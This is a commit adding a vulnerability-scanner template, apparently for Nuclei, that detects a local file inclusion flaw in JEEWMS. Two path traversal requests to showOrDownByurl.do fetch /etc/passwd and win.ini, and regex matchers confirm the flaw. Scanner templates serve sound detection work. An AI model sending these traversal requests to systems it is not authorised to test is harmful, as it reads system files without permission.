Create jeewms-lfi.yaml

patch-1
PikPikcU 2021-06-01 09:08:45 +00:00 committed by GitHub
parent 02a337278a
commit 7f5dfedf55
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: jeewms-lfi
info:
name: JEEWMS LFI
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
tags: jeewms,lfi
requests:
- raw:
- | #linux
GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
- | #windows
GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "for 16-bit app support"
- type: status
status:
- 200